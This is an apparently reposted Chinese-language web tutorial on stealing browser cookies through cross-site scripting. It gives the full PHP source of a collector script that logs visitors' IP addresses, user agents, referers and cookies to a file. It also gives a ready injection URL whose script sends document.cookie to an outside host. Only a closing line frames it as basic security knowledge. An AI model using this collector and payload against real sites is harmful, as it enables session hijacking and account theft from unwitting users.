明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

使用xss偷cookie

發(fā)表時(shí)間:2023-05-31 來(lái)源:明輝站整理相關(guān)軟件相關(guān)文章人氣:

[摘要]使用的工具: 1.免費(fèi)網(wǎng)頁(yè)支援PHP 2.存在xss的脆弱的網(wǎng)站。 vb.php為存放cookie的網(wǎng)頁(yè) PHP Code:<head> <meta http-eq...

使用的工具:

1.免費(fèi)網(wǎng)頁(yè)支援PHP

2.存在xss的脆弱的網(wǎng)站。

vb.php為存放cookie的網(wǎng)頁(yè)

PHP Code:<head>

<meta http-equiv="Content-Language" content="it">

<title>Cookies Stealther - Designed and programmed by R00t[ATI]</title>

</head>

<body bgcolor="#C0C0C0">

<p align="center"><font color="#FF0000">COOKIES STEALTHER</font></p>

<p align="center"><font face="Arial" color="#FF0000">By R00T[ATI]</font></p>

<p align="left"> </p>

</body>

documents.php取得cookie的網(wǎng)頁(yè)P(yáng)HP Code:<?php

$ip = $_SERVER['REMOTE_ADDR'];

$referer = $_SERVER['HTTP_REFERER'];

$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET[c];

$time = date("Y-m-d G:i:s A");

$text = "<br><br>".$time." = ".$ip."<br><br>User Agent: ".$agent."<br>Referer:   ".$referer."<br>Session: ".$data."<br><br><br>";

$file = fopen('vb.php' , 'a');

fwrite($file,$text);

fclose($file);

header("Location: http://www.google.com");

?> Vb.php文件是用來(lái)收集Cookie和其他信息。

documents.php文件用于抓取資料如: IP地址, 用戶代理和cookie 。

現(xiàn)在, 我們需要找到脆弱網(wǎng)站跨站點(diǎn)腳本( XSS ) 。 在這之后插入一個(gè)腳本調(diào)用documents.php是抓住文件的Cookie使用的方法 documents.php?c="+document.cookie;如下例子:

Code:http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location="http://syshack.sy.funpic.de/documents.php?c="+document.cookie;</script>

當(dāng)受害者點(diǎn)到這個(gè)連結(jié)時(shí)cookie就被偷走了會(huì)存放在vb.php里面


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。




標(biāo)簽:運(yùn)用xss偷cookie